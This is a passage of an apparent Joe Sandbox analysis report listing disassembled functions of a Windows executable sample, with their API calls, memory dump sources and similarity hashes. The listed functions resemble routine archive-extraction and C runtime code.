                                Function 00D7DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 813955f0469fc2b4a24177dbfa7fa89412b55bd961709e5e15bba3e01a56269b
                                • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                                • Opcode Fuzzy Hash: 813955f0469fc2b4a24177dbfa7fa89412b55bd961709e5e15bba3e01a56269b
                                • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                                Function 00D7DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: c6c5ea55a16342289fd238fd73ad6db2d79998c5d5e255509b14990d1a3d7679
                                • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                                • Opcode Fuzzy Hash: c6c5ea55a16342289fd238fd73ad6db2d79998c5d5e255509b14990d1a3d7679
                                • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                                Function 00D7DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 92b3299889a9e28d25bf0931f87ab6960e8987780b6219144b8390bba16e929d
                                • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                                • Opcode Fuzzy Hash: 92b3299889a9e28d25bf0931f87ab6960e8987780b6219144b8390bba16e929d
                                • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                                Function 00D69EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                Download Yara Rule
                                APIs
                                • SetEndOfFile.KERNELBASE(?,00D69104,?,?,-00001964), ref: 00D69EC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File
                                • String ID:
                                • API String ID: 749574446-0
                                • Opcode ID: 93e78a622899911f061d15df204f5ca73cd709dc56029b5105649c7768d16ae8
                                • Instruction ID: 1b3a58625109726a68947af77682e736e2eddc02298d765b2b6e56835e5a97d2
                                • Opcode Fuzzy Hash: 93e78a622899911f061d15df204f5ca73cd709dc56029b5105649c7768d16ae8
                                • Instruction Fuzzy Hash: 46B011300A020A8A8E002F30CC088283A20EA2230A30082A0A00ACA0A0CB22C022AA00
                                Function 00D7A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                • SetCurrentDirectoryW.KERNELBASE(?,00D7A587,C:\Users\user\Desktop,00000000,00DA946A,00000006), ref: 00D7A326
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CurrentDirectory
                                • String ID:
                                • API String ID: 1611563598-0
                                • Opcode ID: 20b690ca146bf4cf4fd8a3f705cdc35ae1d5082efb6f0a682f16e15761927db4
                                • Instruction ID: 8a08b5a57d564e8500a5b26abe9b2534fb3e2802d2375116c05d40432ab9bc58
                                • Opcode Fuzzy Hash: 20b690ca146bf4cf4fd8a3f705cdc35ae1d5082efb6f0a682f16e15761927db4
                                • Instruction Fuzzy Hash: 55A01230194206568A000B30CC09C1576505760702F0086227002C00B0CB308C14A510

                                Non-executed Functions

                                Function 00D7B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D7B971
                                • EndDialog.USER32(?,00000006), ref: 00D7B984
                                • GetDlgItem.USER32(?,0000006C), ref: 00D7B9A0
                                • SetFocus.USER32(00000000), ref: 00D7B9A7
                                • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D7B9E1
                                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D7BA18
                                • FindFirstFileW.KERNEL32(?,?), ref: 00D7BA2E
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D7BA4C
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7BA5C
                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D7BA78
                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D7BA94
                                • _swprintf.LIBCMT ref: 00D7BAC4
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D7BAD7
                                • FindClose.KERNEL32(00000000), ref: 00D7BADE
                                • _swprintf.LIBCMT ref: 00D7BB37
                                • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D7BB4A
                                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D7BB67
                                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D7BB87
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7BB97
                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D7BBB1
                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D7BBC9
                                • _swprintf.LIBCMT ref: 00D7BBF5
                                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D7BC08
                                • _swprintf.LIBCMT ref: 00D7BC5C
                                • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D7BC6F
                                  • Part of subcall function 00D7A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D7A662
                                  • Part of subcall function 00D7A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D9E600,?,?), ref: 00D7A6B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                • API String ID: 797121971-1840816070
                                • Opcode ID: 9c3872564e99103d4acf27ffa6169011c86a9e8a4cd12da44ec5e882c62d2a3f
                                • Instruction ID: 749702fae427d4f4c53517beb40b0c9db68c984970534c8cbbfe34097b30b4ea
                                • Opcode Fuzzy Hash: 9c3872564e99103d4acf27ffa6169011c86a9e8a4cd12da44ec5e882c62d2a3f
                                • Instruction Fuzzy Hash: A5919372248349BFD7219BA0DC49FFB77ACEB49714F04481AF789D2191EB719A048B72
                                Function 00D6718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D67191
                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00D672F1
                                • CloseHandle.KERNEL32(00000000), ref: 00D67301
                                  • Part of subcall function 00D67BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D67C04
                                  • Part of subcall function 00D67BF5: GetLastError.KERNEL32 ref: 00D67C4A
                                  • Part of subcall function 00D67BF5: CloseHandle.KERNEL32(?), ref: 00D67C59
                                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00D6730C
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D6741A
                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00D67446
                                • CloseHandle.KERNEL32(?), ref: 00D67457
                                • GetLastError.KERNEL32 ref: 00D67467
                                • RemoveDirectoryW.KERNEL32(?), ref: 00D674B3
                                • DeleteFileW.KERNEL32(?), ref: 00D674DB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                • API String ID: 3935142422-3508440684
                                • Opcode ID: 77e66f75d1d2bbb09f94d2013e1db362334ef9c3903aba1d7d7d2b77eb27f157
                                • Instruction ID: 7b579a0730a4de2533f4f96ec41e2eb9d2571d8990716da809bcf73dc630a82a
                                • Opcode Fuzzy Hash: 77e66f75d1d2bbb09f94d2013e1db362334ef9c3903aba1d7d7d2b77eb27f157
                                • Instruction Fuzzy Hash: 3BB1C271904219ABDF20DFA4DC45BEEBBB8EF04704F0445A9F949E7242DB34AA49CB71
                                Function 00D63281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog_memcmp
                                • String ID: CMT$h%u$hc%u
                                • API String ID: 3004599000-3282847064
                                • Opcode ID: d9aff0505aea46dafe57306f1d70c26eb16ca2ea68985ec2792dbdc308dbd3a2
                                • Instruction ID: d774385f8733c048206ac937f1803f88f5de1216fc1bc6ade564f34ec8fed213
                                • Opcode Fuzzy Hash: d9aff0505aea46dafe57306f1d70c26eb16ca2ea68985ec2792dbdc308dbd3a2
                                • Instruction Fuzzy Hash: 74328E715147849FDF14DF64C896AEA37A5EF55300F08457EFD8A8B282EB70AA48CB70
                                Function 00D8D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                • Opcode ID: 87f9838cb50a149a67c4edb36208da15769dae42bedaf743474213a4a421efef
                                • Instruction ID: d70630221f55ae431ec6e807abb848c15090aa03b7b82adb908d4e09870a342c
                                • Opcode Fuzzy Hash: 87f9838cb50a149a67c4edb36208da15769dae42bedaf743474213a4a421efef
                                • Instruction Fuzzy Hash: B3C25C71E086288FDB25EF28DD407E9B3B6EB44315F1945EAD44DE7280E774AE818F60
                                Function 00D627E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D627F1
                                • _strlen.LIBCMT ref: 00D62D7F
                                  • Part of subcall function 00D7137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D6B652,00000000,?,?,?,0001042C), ref: 00D71396
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D62EE0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                • String ID: CMT
                                • API String ID: 1706572503-2756464174
                                • Opcode ID: 115eaf4443a83e98a679086f707aa349af4365f61c51000740bd975113d6de05
                                • Instruction ID: 3c7de7424393a65ab9960e32bf7ad876f14a24d50efd784c8da7f17392566433
                                • Opcode Fuzzy Hash: 115eaf4443a83e98a679086f707aa349af4365f61c51000740bd975113d6de05
                                • Instruction Fuzzy Hash: 0D62E2715106848FDF18DF68C8956FA3BE1EF58304F09457EEC9A8B286DB70A949CB70
                                Function 00D8866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D88767
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D88771
                                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00D8877E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: b55934d86301b9f226436114307a719f2f1e41507ed5034f8a5d01aabe7fe070
                                • Instruction ID: 3cfe90e04c16ed280d3ff0eee0612e5462055ed4ca8ce13fe0e08e130d8d5f48
                                • Opcode Fuzzy Hash: b55934d86301b9f226436114307a719f2f1e41507ed5034f8a5d01aabe7fe070
                                • Instruction Fuzzy Hash: 4931B5759013289BCB21DF64DC89B9DBBB8EF08310F5041EAE90CA7251EB349B858F55
                                Function 00D8CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                • Instruction ID: 38aa944026b58aedc1c4bbaac0279b64a78b62f6d420832ecb8a20ca14034957
                                • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                • Instruction Fuzzy Hash: 0A021C71E11119DBDF14DFA9C8806ADBBF1EF48314F29816AE919E7284D731AD418BA0
                                Function 00D7A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D7A662
                                • GetNumberFormatW.KERNEL32(00000400,00000000,?,00D9E600,?,?), ref: 00D7A6B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FormatInfoLocaleNumber
                                • String ID:
                                • API String ID: 2169056816-0
                                • Opcode ID: 3187118788c700bdceadb93c1d4406dc4d53c44c8c9dfbb54a06000c38c32a31
                                • Instruction ID: 41a9f712b228579107aca205cafbb314140d83e3ddac2b71721c945c1476f9d3
                                • Opcode Fuzzy Hash: 3187118788c700bdceadb93c1d4406dc4d53c44c8c9dfbb54a06000c38c32a31
                                • Instruction Fuzzy Hash: 05014C36100308EADB10CF65EC05F9B77BCEF19710F005922BA08E7260D3709A248BB5
                                Function 00D66EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00D7117C,?,00000200), ref: 00D66EC9
                                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00D66EEA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorFormatLastMessage
                                • String ID:
                                • API String ID: 3479602957-0
                                • Opcode ID: ffbba8cc8f22633e47f1f33e2af1cd606659047b0c1fe0e0bbe06b56c263d239
                                • Instruction ID: 14eaf5b3ac08c2de00d47b10c216ba49f12ce54b1f7e1ad587e460fd264a76ca
                                • Opcode Fuzzy Hash: ffbba8cc8f22633e47f1f33e2af1cd606659047b0c1fe0e0bbe06b56c263d239
                                • Instruction Fuzzy Hash: 47D0C9353C8302BFEB110E75CC06F2B7BA4A755B82F20C515B35AE90E1CA71D424D639
                                Function 00D91194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D9118F,?,?,00000008,?,?,00D90E2F,00000000), ref: 00D913C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
